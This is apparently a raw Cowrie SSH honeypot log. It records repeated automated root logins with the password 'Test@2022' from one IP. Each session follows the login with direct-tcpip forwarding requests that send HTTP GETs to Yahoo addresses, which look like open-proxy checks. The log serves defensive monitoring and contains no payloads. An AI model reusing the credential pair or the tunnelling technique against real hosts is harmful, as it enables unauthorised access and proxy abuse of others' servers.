{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.018472Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.301329Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":10030,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10030","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.359097Z","session":"abb47ce6f47f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.416751Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":1381,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1381","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.571038Z","session":"abb47ce6f47f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.627969Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.685470Z","src_ip":"213.209.150.239","session":"abb47ce6f47f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42421,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b84d58aba23","protocol":"ssh","message":"New connection: 213.209.150.239:42421 (1.2.3.4:22) [session: 3b84d58aba23]","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.731431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.732093Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:32.779249Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.014724Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14460,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14460","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.063146Z","session":"3b84d58aba23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.110715Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":13591,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13591","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.245419Z","session":"3b84d58aba23"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.292531Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.340394Z","src_ip":"213.209.150.239","session":"3b84d58aba23"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42475,"dst_ip":"1.2.3.4","dst_port":22,"session":"474adbd453de","protocol":"ssh","message":"New connection: 213.209.150.239:42475 (1.2.3.4:22) [session: 474adbd453de]","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.387396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.388071Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.435588Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.669992Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":9772,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9772","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.717810Z","session":"474adbd453de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.764870Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":18749,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:18749","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.901543Z","session":"474adbd453de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.948644Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:33.996674Z","src_ip":"213.209.150.239","session":"474adbd453de"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42529,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d165b45bb7b","protocol":"ssh","message":"New connection: 213.209.150.239:42529 (1.2.3.4:22) [session: 4d165b45bb7b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.042730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.043342Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.090308Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.324190Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31058,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31058","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.372123Z","session":"4d165b45bb7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.419270Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18101,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18101","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.553517Z","session":"4d165b45bb7b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.601380Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.649560Z","src_ip":"213.209.150.239","session":"4d165b45bb7b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42585,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d67de084610","protocol":"ssh","message":"New connection: 213.209.150.239:42585 (1.2.3.4:22) [session: 9d67de084610]","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.695465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.696252Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.743525Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":34674,"dst_ip":"1.2.3.4","dst_port":22,"session":"92f994e1c0a8","protocol":"ssh","message":"New connection: 27.112.78.170:34674 (1.2.3.4:22) [session: 92f994e1c0a8]","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.895160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.895781Z","src_ip":"27.112.78.170","session":"92f994e1c0a8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:34.978481Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":10703,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10703","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.026634Z","session":"9d67de084610"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.073936Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.162397Z","src_ip":"27.112.78.170","session":"92f994e1c0a8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4490,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4490","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.209618Z","session":"9d67de084610"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.256729Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.304284Z","src_ip":"213.209.150.239","session":"9d67de084610"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":42630,"dst_ip":"1.2.3.4","dst_port":22,"session":"8037ebbdc90c","protocol":"ssh","message":"New connection: 213.209.150.239:42630 (1.2.3.4:22) [session: 8037ebbdc90c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.360219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:35.361188Z","src_ip":"213.209.150.239","session":"8037ebbdc90c"}
